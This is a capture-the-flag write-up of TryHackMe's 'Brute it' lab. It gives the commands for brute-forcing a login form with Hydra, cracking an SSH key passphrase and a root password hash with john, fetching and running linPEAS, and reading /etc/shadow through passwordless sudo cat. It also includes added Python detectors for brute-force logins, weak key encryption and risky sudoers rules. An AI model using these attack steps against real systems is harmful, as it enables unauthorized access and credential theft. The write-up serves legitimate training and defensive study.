[CTF] Tryhackme : Brute it

6 min read, Nov 8, 2020

01 : Introduction

Welcome to this writeup of the CTF ‘Brute it’, published by ReddyyZ on the Tryhackme platform.

As mentioned in the room’s introduction, this CTF is designed for beginners and covers the following fields: brute force, hash cracking and privilege escalation. Let’s start with enumeration and a scan of the machine.

02 : Enumeration

As usual, we start by scanning the machine with nmap, using the following command:

nmap -sC -sV <MACHINE-IP>

scan with nmap

The scan shows 2 open ports: SSH on port 22 and a web server on port 80. If we browse to the website, we only see the default page of the Apache server:

index page of the website

I looked through the source code but found nothing relevant there. Next, we can enumerate the website with the tool gobuster. First, we look for interesting folders or files on this web server with this command:

gobuster dir -u http://<MACHINE-IP> -w /usr/share/dirbuster/directory-list-2.3-medium.txt

After a few seconds we have a result:

enumeration with gobuster command

We find a form requiring a username and a password:

form page

If we look closely at the source code, there is something interesting…

Page’s source code

Now that we have a username, we need a way to find the password. As the room’s title suggests, we can brute-force it, and the tool Hydra is well suited for this. Before that, we need to understand how the form works: where it is submitted, which error message tells the user that the credentials are wrong, and which parameters are sent with the form.

I submitted admin as username and admin as password; the error message is “Username or password invalid”. We can also see that the form is sent with a POST request to the address /admin/ with the following parameters: user and pass. We have gathered the information Hydra needs, so we can launch the command:

hydra -l admin -P rockyou.txt <IP Machine> http-post-form "/admin/:user=^USER^&pass=^PASS^:F=invalid"

The wordlist used is rockyou, a famous one that you can easily find on GitHub, for example.
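From the defender’s side, the brute force described above leaves a very visible trace: many POST requests to /admin/ from one client in a short time, all answered with HTTP 200 because the form reports a wrong password in the page body rather than with an error status. As an added example, not part of the original writeup, the following Python parses Apache combined-format access log lines and flags clients whose number of POSTs to the login path exceeds a threshold inside a sliding time window. The log lines, IP addresses, path and threshold are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One Apache "combined" access log line. Failed logins on this form return
# HTTP 200 with an error message in the body, so the status code cannot be
# used to spot failures; we count POSTs to the login path instead.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for unparsable lines."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"], int(m["status"])


def find_bruteforce(log_text, path="/admin/", threshold=10, window_seconds=60):
    """Return {ip: peak} for clients that POSTed to `path` at least `threshold`
    times inside any sliding window of `window_seconds`."""
    attempts = defaultdict(list)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, method, req_path, _status = parsed
        if method == "POST" and req_path == path:
            attempts[ip].append(ts)

    window = timedelta(seconds=window_seconds)
    flagged = {}
    for ip, times in attempts.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            # Move the window start forward until it spans at most window_seconds
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def _line(ip, second, method, path, status=200):
    """Build one constructed log line (addresses and times are made up)."""
    return (f'{ip} - - [08/Nov/2020:10:00:{second:02d} +0000] '
            f'"{method} {path} HTTP/1.1" {status} 1234 "-" "Mozilla/5.0"')


# Constructed sample: one client fires 12 POSTs at the form within 3 seconds,
# a second client logs in normally (one GET, two POSTs 11 seconds apart).
SAMPLE_LOG = "\n".join(
    [_line("10.10.14.5", s // 4, "POST", "/admin/") for s in range(12)]
    + [_line("192.168.1.20", 5, "GET", "/admin/"),
       _line("192.168.1.20", 9, "POST", "/admin/"),
       _line("192.168.1.20", 20, "POST", "/admin/"),
       _line("10.10.14.5", 30, "GET", "/")]
)

if __name__ == "__main__":
    for ip, peak in find_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {peak} POST /admin/ attempts within 60 s")
```

The threshold and window are tuning knobs: a legitimate user retyping a password produces a handful of POSTs spread over minutes, while a wordlist run produces dozens per second, so even a generous threshold separates the two.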

Brute force POST form with hydra

And we have a result! Now we can enter the login and password to access this part of the website.

Page after successful login

We get the web flag. One of the users on the machine is probably called john. The page also contains an RSA private key for this user, which we can probably use to connect to the machine over SSH. However, the key is protected by a passphrase that we first need to find; this is the aim of the next step.

03 : Foothold

For this step, we’ll use john. First, we save the key to a file (here named rsa). Then we extract a crackable hash from it with the ssh2john.py script, like this:

ssh2john.py rsa > rsa.hash

get hash with john

Now we can use john with the rockyou wordlist to get the passphrase:

john rsa.hash --wordlist=rockyou.txt

crack passphrase with john
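The cracking step works because ssh2john reads the cipher name, KDF parameters and encrypted blob out of the key file, so john can test candidate passphrases entirely offline. As an added example (my code, not ssh2john’s and not the room’s material), the following Python reads the same header fields to report whether a private key is passphrase-protected at all, and with which KDF. For a defender doing a key inventory the interesting cases are keys with no encryption, and legacy PEM keys whose encryption key is derived with OpenSSL’s fast MD5-based EVP_BytesToKey rather than bcrypt rounds. The `build_openssh_key` helper and the `LEGACY_ENCRYPTED_PEM` constant produce constructed containers with dummy key material; they are not real keys.

```python
import base64
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _ssh_string(data: bytes) -> bytes:
    """Encode bytes as an SSH 'string' (uint32 big-endian length + payload)."""
    return struct.pack(">I", len(data)) + data


def _read_string(buf: bytes, offset: int):
    (length,) = struct.unpack_from(">I", buf, offset)
    offset += 4
    return buf[offset:offset + length], offset + length


def inspect_private_key(pem_text: str) -> dict:
    """Report whether a PEM private key is passphrase-protected and how.

    Handles the two layouts ssh-keygen produces: the openssh-key-v1 container
    (cipher/KDF names in the header, bcrypt rounds in kdfoptions) and the
    legacy PKCS#1 PEM, where encryption is signalled by Proc-Type/DEK-Info.
    """
    lines = [l.strip() for l in pem_text.strip().splitlines() if l.strip()]
    header, body = lines[0], lines[1:-1]
    if header == "-----BEGIN OPENSSH PRIVATE KEY-----":
        raw = base64.b64decode("".join(body))
        if not raw.startswith(OPENSSH_MAGIC):
            raise ValueError("not an openssh-key-v1 blob")
        off = len(OPENSSH_MAGIC)
        cipher, off = _read_string(raw, off)
        kdf, off = _read_string(raw, off)
        kdfoptions, off = _read_string(raw, off)
        rounds = None
        if kdf == b"bcrypt":
            # kdfoptions = string salt, uint32 rounds
            _salt, opt_off = _read_string(kdfoptions, 0)
            (rounds,) = struct.unpack_from(">I", kdfoptions, opt_off)
        return {"format": "openssh-key-v1", "cipher": cipher.decode(),
                "kdf": kdf.decode(), "rounds": rounds, "encrypted": cipher != b"none"}

    # Legacy PEM: header lines look like "Proc-Type: 4,ENCRYPTED"; base64 has no ':'
    headers = {}
    for l in body:
        key, sep, value = l.partition(":")
        if sep:
            headers[key.strip()] = value.strip()
    encrypted = headers.get("Proc-Type", "").endswith("ENCRYPTED")
    cipher = headers["DEK-Info"].split(",")[0] if encrypted else "none"
    return {"format": "legacy-pem", "cipher": cipher,
            "kdf": "EVP_BytesToKey(MD5)" if encrypted else "none",
            "rounds": 1 if encrypted else None, "encrypted": encrypted}


def build_openssh_key(cipher: str, kdf: str, rounds: int = 16) -> str:
    """Constructed openssh-key-v1 container with dummy key material (not a real key)."""
    kdfoptions = b""
    if kdf == "bcrypt":
        kdfoptions = _ssh_string(b"\x00" * 16) + struct.pack(">I", rounds)  # salt, rounds
    raw = (OPENSSH_MAGIC
           + _ssh_string(cipher.encode()) + _ssh_string(kdf.encode()) + _ssh_string(kdfoptions)
           + struct.pack(">I", 1)                       # number of keys
           + _ssh_string(b"dummy public key")
           + _ssh_string(b"dummy private section"))
    b64 = base64.b64encode(raw).decode()
    wrapped = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{wrapped}\n-----END OPENSSH PRIVATE KEY-----\n"


# Constructed legacy PEM: headers are realistic, the base64 body is a dummy.
LEGACY_ENCRYPTED_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=
-----END RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for sample in (build_openssh_key("aes256-ctr", "bcrypt", rounds=24),
                   build_openssh_key("none", "none"), LEGACY_ENCRYPTED_PEM):
        print(inspect_private_key(sample))
```

Note that even a bcrypt-protected key only buys time: the KDF slows each guess down, but a passphrase that appears in rockyou is still found, which is exactly what happened in this room.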

We get a passphrase! Before using the key, we need to restrict its permissions, otherwise ssh refuses to use a key that is readable by other users:

chmod 400 rsa

Everything is ready now! We can connect to the machine:

ssh -i rsa john@<IP Machine>

connection to machine with ssh

It works! We can read the user flag located in the user’s home folder:

Read user flag

04 : Privilege Escalation

Now we want to get access to an account with more privileges, ideally root, so we need to find a way to get there. Running the id command shows that my user, john, is in the sudo group, so I could simply run sudo su to become root. However, I do not have john’s password, which sudo asks for.

result of id command

Let’s look in the /etc/crontab file to see if there is a scheduled task I can manipulate to get access:

Read of crontab file

Nothing much of interest there either…

So I’m going to use linPEAS, a script that enumerates a machine and looks for privilege escalation vectors. To transfer the script from my machine to the box, I start a web server with python in the folder containing the script, like this:

sudo python3 -m http.server 80

creation of web server from my machine

Then we can fetch the file from the box with wget:

wget http://<MY Machine IP>/linPEAS.sh

Retrieval of the linpeas file from the remote machine

Now I just have to make the script executable:

chmod +x linPEAS.sh

And… let’s execute the script!

./linPEAS.sh

A few moments later, I noticed something interesting:

Result of linPEAS

Why is this relevant? If we can run cat with sudo without entering any password, we can read, for example, the /etc/shadow file, which contains the users’ password hashes. That is what we’ll do:

shadow content
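What linPEAS surfaced here is a sudoers rule: cat may be run as root without a password, and a binary whose only job is to print files will print /etc/shadow just as happily as a log file. As an added example (my code, not linPEAS and not the room’s configuration), the following Python parses sudoers-style user specifications and reports NOPASSWD rules that grant either ALL or a file-printing binary; it also honours the PASSWD tag, which cancels a preceding NOPASSWD in the same command list. The `SAMPLE_SUDOERS` content, its users and rules are constructed for this example.

```python
import os
import re

# user  host = (runas) [TAG:] cmd [, [TAG:] cmd ...]   (aliases and Defaults are skipped)
USER_SPEC_RE = re.compile(
    r'^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$'
)
TAGS = {"NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV",
        "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT", "MAIL", "NOMAIL"}
OPPOSITE = {"NOPASSWD": "PASSWD", "PASSWD": "NOPASSWD"}
# Binaries whose purpose is to output file contents: run as root they read anything.
FILE_READERS = {"cat", "tac", "head", "tail", "more", "less", "nl"}


def parse_sudoers(text):
    """Yield (user, runas, tags, command) for every command in each user specification."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        if not line or line.startswith(("Defaults", "User_Alias", "Host_Alias",
                                        "Cmnd_Alias", "Runas_Alias")):
            continue
        m = USER_SPEC_RE.match(line)
        if m is None:
            continue
        runas = m["runas"] or "root"
        tags = set()
        # Commands are comma separated (commas inside arguments are not handled);
        # a tag stays in effect for the following commands until its opposite appears.
        for spec in m["cmds"].split(","):
            spec = spec.strip()
            while True:
                head, sep, rest = spec.partition(":")
                tag = head.strip().upper()
                if not sep or tag not in TAGS:
                    break
                tags.discard(OPPOSITE.get(tag, ""))
                tags.add(tag)
                spec = rest.strip()
            if spec:
                yield m["user"], runas, frozenset(tags), spec


def audit_nopasswd(text):
    """Return (user, runas, command, reason) for NOPASSWD entries that allow
    any command, or a binary that prints arbitrary files."""
    findings = []
    for user, runas, tags, cmd in parse_sudoers(text):
        if "NOPASSWD" not in tags:
            continue
        if cmd == "ALL":
            findings.append((user, runas, cmd, "any command, no password"))
            continue
        binary = os.path.basename(cmd.split()[0])
        if binary in FILE_READERS:
            findings.append((user, runas, cmd,
                             f"{binary} reads any file as {runas}, e.g. /etc/shadow"))
    return findings


# Constructed sample sudoers file; users and rules are made up for this example.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
alice   ALL=(root) NOPASSWD: /bin/cat
bob     ALL=(root) NOPASSWD: /usr/bin/systemctl restart webapp, /usr/bin/systemctl status webapp
carol   ALL=(ALL) NOPASSWD: ALL
dave    ALL=(root) NOPASSWD: /usr/bin/less, PASSWD: /usr/bin/apt
"""

if __name__ == "__main__":
    for user, runas, cmd, reason in audit_nopasswd(SAMPLE_SUDOERS):
        print(f"{user} -> ({runas}) {cmd}: {reason}")
```

The fix on the defending side is the usual one: NOPASSWD only for a tightly scoped command with fixed arguments (bob’s systemctl rules pass the audit), never for a generic file reader or for ALL.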

We save the root password hash in a file on our computer (here named root.hash) and then, as for the RSA key, use john with the rockyou wordlist to recover the password:

john root.hash --wordlist=rockyou.txt

crack root pass with john

And that’s it! Now I just have to run su with the password we found and we’re root on this machine!

Get access to root

To finish the room, we retrieve the root flag located in the /root folder.

Find and read root flag.

The room is now over. I hope you enjoyed it; it is really a great way to discover brute force and tools like hydra or john.